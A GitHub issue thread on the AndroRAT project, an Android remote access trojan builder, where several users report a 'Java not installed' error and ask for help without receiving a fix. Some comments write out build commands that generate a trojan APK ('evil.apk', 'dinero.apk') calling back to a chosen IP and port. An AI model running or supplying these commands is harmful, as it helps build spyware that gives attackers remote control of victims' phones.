### ISSUE TITLE
Java not installed problem

### ISSUE THREAD

**Issue by hshakibul** [karma9874/AndroRAT#46]
#
![Screenshot_2020-12-30-00-19-30-23](https://user-images.githubusercontent.com/67088120/103305195-b3c94900-4a34-11eb-83a6-20a35b3d5315.png)
Pls 🙏 solve this

**Comment by vimal014** [comment]
Try to run with sudo
Here is example
Sudo python androRAT.py --build -i 192.169.1.8 -p 8000 -o evil.apk

**Comment by hashmik** [comment]
i have the same problem too i hope to get an answer from someone here

**Comment by Godie360** [comment]
Me too i have that issue

**Comment by starlockz** [comment]
Plzz help us anyone

**Comment by Vaselina-RD** [comment]
!!! Saludos desde República Dominicana !!!

Le comento que tengo varios días tratando de instalar AndroRAT en Termux o kali Linux y me da Distinto Errores.
Nota : Mi celular es un ( Nokia C2 US TA-1218 Tennen ) el cual NO ES ROOT
Ya he visto un montón de videos buscando soluciones, y no he tenido suerte...
Estos son algunos de los Errores que me salen

~/AndroRAT # python3 androRAT.py --build -i 127.0.0.1 -p 8080 -o dinero.apk
[ERROR] Java not installed or found
~/AndroRAT # python androRAT.py --build -i 127.0.0.1 -p 8080 -o dinero.apk
[ERROR] Java not installed or found
~/AndroRAT # python androRAT.py --build -i 0.0.0.0 -p 8080 -o dinero.apk
[ERROR] Java not installed or found
~/AndroRAT # ls
Android_Code  Jar_utils  Screenshots  requirements.txt
Compiled_apk  LICENSE    __pycache__  utils.py
Dumps         README.md  androRAT.py
~/AndroRAT # python androRAT.py -h
usage: androRAT.py [--build] [--shell] [-i <IP> -p <PORT> -o <apk name>]

Ya he instalado Java y siguen los mismo ERRORES

Atte : Vaselina~RD
Lunes 17 Marzo 25 8:44 am

**Comment by Deepak1138** [comment]
I've fixed this issue. 🙄

**Comment by abcd619** [comment]
> I've fixed this issue. 🙄

Please tellĺ bro how to solve

**Comment by Ravar69** [comment]
> I've fixed this issue. 🙄

How ?
